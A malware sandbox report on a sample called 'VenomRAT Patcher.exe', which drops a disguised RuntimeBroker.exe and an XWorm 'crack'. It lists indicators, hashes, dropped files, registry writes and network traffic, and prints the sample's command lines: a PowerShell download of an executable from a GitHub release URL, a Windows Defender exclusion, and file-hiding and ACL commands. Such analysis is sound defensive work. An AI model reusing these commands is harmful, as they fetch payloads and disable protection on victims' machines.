File name:

VenomRAT Patcher.exe

Full analysis: https://app.any.run/tasks/6f9f6d32-2b90-480d-b87b-aa6836dce09d
Verdict: Malicious activity
Analysis date: May 17, 2025, 05:29:47
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
python
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 7 sections
MD5:

07C653D74342733B925F3CE700A75604

SHA1:

3EBBECF91881F8D666E74211C0C9662CFDB6B1DF

SHA256:

F949F581B93CB366EBF915797331A45FDF856B123ECAEEF8BDB42D5F0DDBDFE8

SSDEEP:

98304:CCYzBnbSb4Y6ZhkDQet54nHZUj0vU9XLDbenkuA83wpYp2twldaQ0EACheua5DRC:sp2z881mwH/kit496ikY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 6048)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 5024)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6944)
      • powershell.exe (PID: 2316)
      • powershell.exe (PID: 5304)
      • powershell.exe (PID: 1052)
      • powershell.exe (PID: 6488)
      • powershell.exe (PID: 6040)
      • powershell.exe (PID: 6228)
      • powershell.exe (PID: 5204)
      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 1600)
      • powershell.exe (PID: 1760)
      • powershell.exe (PID: 6736)
      • powershell.exe (PID: 2288)
      • powershell.exe (PID: 5084)

    • Changes Windows Defender settings

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 6048)
      • cmd.exe (PID: 5024)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1300)
      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 6048)
      • cmd.exe (PID: 5024)

    • Application launched itself

      • VenomRAT Patcher.exe (PID: 2656)

    • Process drops python dynamic module

      • VenomRAT Patcher.exe (PID: 2656)

    • Executable content was dropped or overwritten

      • VenomRAT Patcher.exe (PID: 2656)
      • RuntimeBroker.exe (PID: 6132)
      • powershell.exe (PID: 1852)

    • Process drops legitimate windows executable

      • VenomRAT Patcher.exe (PID: 2656)
      • powershell.exe (PID: 1852)

    • Loads Python modules

      • VenomRAT Patcher.exe (PID: 4224)

    • The process drops C-runtime libraries

      • VenomRAT Patcher.exe (PID: 2656)

    • Starts CMD.EXE for commands execution

      • VenomRAT Patcher.exe (PID: 4224)
      • wscript.exe (PID: 5552)
      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
      • RuntimeBroker.exe (PID: 3032)
      • RuntimeBroker.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 5172)
      • RuntimeBroker.exe (PID: 5544)
      • RuntimeBroker.exe (PID: 5176)
      • RuntimeBroker.exe (PID: 5968)
      • RuntimeBroker.exe (PID: 444)
      • RuntimeBroker.exe (PID: 2064)
      • RuntimeBroker.exe (PID: 6264)
      • RuntimeBroker.exe (PID: 5972)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 5552)
      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
      • RuntimeBroker.exe (PID: 3032)
      • VenomRAT Patcher.exe (PID: 4224)
      • RuntimeBroker.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 5172)
      • RuntimeBroker.exe (PID: 5544)
      • RuntimeBroker.exe (PID: 5176)
      • RuntimeBroker.exe (PID: 5968)
      • RuntimeBroker.exe (PID: 444)
      • RuntimeBroker.exe (PID: 2064)
      • RuntimeBroker.exe (PID: 6264)
      • RuntimeBroker.exe (PID: 5972)

    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 1300)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 6048)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 5024)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 6048)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 5024)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 6048)
      • cmd.exe (PID: 5024)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5552)

    • The executable file from the user directory is run by the CMD process

      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
      • RuntimeBroker.exe (PID: 3032)
      • RuntimeBroker.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 5172)
      • RuntimeBroker.exe (PID: 5544)
      • RuntimeBroker.exe (PID: 5176)
      • RuntimeBroker.exe (PID: 5968)
      • RuntimeBroker.exe (PID: 444)
      • RuntimeBroker.exe (PID: 2064)
      • RuntimeBroker.exe (PID: 5972)
      • RuntimeBroker.exe (PID: 6264)

    • Reads the date of Windows installation

      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)

    • Reads security settings of Internet Explorer

      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)

    • Executes application which crashes

      • XWorm V5.6 Crack.exe (PID: 3676)
      • XWorm V5.6 Crack.exe (PID: 5244)
      • XWorm V5.6 Crack.exe (PID: 1628)
      • XWorm V5.6 Crack.exe (PID: 2320)
      • XWorm V5.6 Crack.exe (PID: 6760)
      • XWorm V5.6 Crack.exe (PID: 6632)
      • XWorm V5.6 Crack.exe (PID: 444)
      • XWorm V5.6 Crack.exe (PID: 2064)
      • XWorm V5.6 Crack.exe (PID: 3884)
      • XWorm V5.6 Crack.exe (PID: 1600)
      • XWorm V5.6 Crack.exe (PID: 6640)
      • XWorm V5.6 Crack.exe (PID: 5984)

    • The process executes VB scripts

      • cmd.exe (PID: 1300)

  • INFO

    • Reads the computer name

      • VenomRAT Patcher.exe (PID: 2656)
      • RuntimeBroker.exe (PID: 6132)
      • XWorm V5.6 Crack.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 1012)
      • XWorm V5.6 Crack.exe (PID: 5244)
      • VenomRAT Patcher.exe (PID: 4224)

    • The sample compiled with english language support

      • VenomRAT Patcher.exe (PID: 2656)

    • Checks supported languages

      • VenomRAT Patcher.exe (PID: 4224)
      • VenomRAT Patcher.exe (PID: 2656)
      • XWorm V5.6 Crack.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
      • XWorm V5.6 Crack.exe (PID: 5244)

    • Create files in a temporary directory

      • VenomRAT Patcher.exe (PID: 2656)
      • VenomRAT Patcher.exe (PID: 4224)
      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)

    • Checks proxy server information

      • VenomRAT Patcher.exe (PID: 4224)
      • powershell.exe (PID: 1852)
      • powershell.exe (PID: 872)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 664)
      • powershell.exe (PID: 4728)
      • powershell.exe (PID: 2800)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 664)
      • powershell.exe (PID: 4728)
      • powershell.exe (PID: 872)
      • powershell.exe (PID: 2800)

    • Disables trace logs

      • powershell.exe (PID: 1852)
      • powershell.exe (PID: 872)

    • Reads the machine GUID from the registry

      • RuntimeBroker.exe (PID: 6132)
      • XWorm V5.6 Crack.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 1012)
      • XWorm V5.6 Crack.exe (PID: 5244)

    • Process checks computer location settings

      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)

    • Creates files or folders in the user directory

      • WerFault.exe (PID: 2800)
      • WerFault.exe (PID: 672)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:05:17 04:50:08+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 173568
InitializedDataSize: 101888
UninitializedDataSize: -
EntryPoint: 0xce30
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
295
Monitored processes
149
Malicious processes
26
Suspicious processes
0

Behavior graph

Click at the process to see the details
start venomrat patcher.exe venomrat patcher.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs sppextcomobj.exe no specs slui.exe cacls.exe no specs wscript.exe no specs cmd.exe conhost.exe no specs powershell.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs slui.exe attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
300attrib +h "C:\Users\admin\AppData\Local\Anon\RuntimeBroker.exe" /s /dC:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
444"C:\Users\admin\AppData\Local\Temp\XWorm V5.6 Crack.exe" C:\Users\admin\AppData\Local\Temp\XWorm V5.6 Crack.exe
RuntimeBroker.exe
User:
admin
Company:
@ThreatCommunity
Integrity Level:
HIGH
Description:
XWorm by @ThreatCommunity
Exit code:
3762504530
Version:
5.6.0.0
Modules
Images
c:\users\admin\appdata\local\temp\xworm v5.6 crack.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
444RuntimeBroker.exe C:\Users\admin\AppData\Local\Anon\RuntimeBroker.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Update Assistant
Exit code:
0
Version:
10.0.18362.1
Modules
Images
c:\users\admin\appdata\local\anon\runtimebroker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
664powershell.exe -command "Add-MpPreference -ExclusionPath "C:\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
672C:\WINDOWS\system32\WerFault.exe -u -p 5244 -s 932C:\Windows\System32\WerFault.exeXWorm V5.6 Crack.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
680\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
812Powershell -Command "Invoke-Webrequest 'https://github.com/wha-gifart/gifart/releases/download/SDA/RuntimeBroker.exe' -OutFile RuntimeBroker.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
864"C:\WINDOWS\system32\cacls.exe" "C:\WINDOWS\system32\config\system"C:\Windows\System32\cacls.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Control ACLs Program
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cacls.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
872Powershell -Command "Invoke-Webrequest 'https://github.com/wha-gifart/gifart/releases/download/SDA/RuntimeBroker.exe' -OutFile RuntimeBroker.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
924\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
211 809
Read events
211 717
Write events
56
Delete events
36

Modification events

(PID) Process:(1300) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:ProgramId
Value:
00064ee32d88d6ce3eb386c7e88f7c8d705600000000
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:FileId
Value:
00003547dfaa6e524a367aff90b685bdb5e728c1bfeb
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:LowerCaseLongPath
Value:
c:\users\admin\appdata\local\temp\xworm v5.6 crack.exe
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:LongPathHash
Value:
xworm v5.6 crack|b448236e62d20cab
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:Name
Value:
XWorm V5.6 Crack.exe
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:OriginalFileName
Value:
xworm.exe
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:Publisher
Value:
@threatcommunity
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:Version
Value:
5.6.0.0
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:BinFileVersion
Value:
5.6.0.0
Executable files
57
Suspicious files
27
Text files
93
Unknown types
0

Dropped files

PID
Process
Filename
Type
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\_socket.pydexecutable
MD5:566CB4D39B700C19DBD7175BD4F2B649
SHA256:77EBA293FE03253396D7BB6E575187CD026C80766D7A345EB72AD92F0BBBC3AA
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\VCRUNTIME140.dllexecutable
MD5:32DA96115C9D783A0769312C0482A62D
SHA256:8B10C53241726B0ACC9F513157E67FCB01C166FEC69E5E38CA6AADA8F9A3619F
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\_lzma.pydexecutable
MD5:D63E2E743EA103626D33B3C1D882F419
SHA256:7C2D2030D5D246739C5D85F087FCF404BC36E1815E69A8AC7C9541267734FC28
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\_bz2.pydexecutable
MD5:684D656AADA9F7D74F5A5BDCF16D0EDB
SHA256:A5DFB4A663DEF3D2276B88866F6D220F6D30CC777B5D841CF6DBB15C6858017C
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\_ssl.pydexecutable
MD5:689F1ABAC772C9E4C2D3BAD3758CB398
SHA256:D3A89AA7E4A1DF1151632A8A5CAF338C4DDDB674EC093BFDBC122ADC9DB28A97
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\_decimal.pydexecutable
MD5:21FCB8E3D4310346A5DC1A216E7E23CA
SHA256:9A0E05274CAD8D90F6BA6BC594261B36BFBDDF4F5CA6846B6367FE6A4E2FDCE4
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-fibers-l1-1-0.dllexecutable
MD5:B5E2760C5A46DBEB8AE18C75F335707E
SHA256:91D249D7BC0E38EF6BCB17158B1FDC6DD8888DC086615C9B8B750B87E52A5FB3
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\_hashlib.pydexecutable
MD5:3E540EF568215561590DF215801B0F59
SHA256:0ED7A6ED080499BC6C29D7113485A8A61BDBA93087B010FCA67D9B8289CBE6FA
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-console-l1-1-0.dllexecutable
MD5:9F746F4F7D845F063FEA3C37DCEBC27C
SHA256:88ACE577A9C51061CB7D1A36BABBBEFA48212FADC838FFDE98FDFFF60DE18386
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-errorhandling-l1-1-0.dllexecutable
MD5:C2F8C03ECCE9941492BFBE4B82F7D2D5
SHA256:D56CE7B1CD76108AD6C137326EC694A14C99D48C3D7B0ACE8C3FF4D9BCEE3CE8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
50
DNS requests
20
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
304
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
304
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2384
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2384
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.216.77.6:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
23.216.77.6:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4224
VenomRAT Patcher.exe
140.82.121.4:443
github.com
GITHUB
US
whitelisted
4224
VenomRAT Patcher.exe
185.199.109.133:443
objects.githubusercontent.com
FASTLY
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
google.com
  • 142.250.185.78
whitelisted
crl.microsoft.com
  • 23.216.77.6
  • 23.216.77.42
  • 23.216.77.28
whitelisted
www.microsoft.com
  • 23.35.229.160
  • 184.30.21.171
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
github.com
  • 140.82.121.4
  • 140.82.121.3
whitelisted
objects.githubusercontent.com
  • 185.199.109.133
  • 185.199.110.133
  • 185.199.111.133
  • 185.199.108.133
whitelisted
login.live.com
  • 40.126.31.69
  • 40.126.31.73
  • 40.126.31.2
  • 40.126.31.0
  • 20.190.159.64
  • 20.190.159.73
  • 40.126.31.129
  • 40.126.31.130
  • 20.190.159.131
  • 20.190.159.68
  • 20.190.159.75
  • 20.190.159.23
  • 20.190.159.0
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
VenomRAT Patcher.exe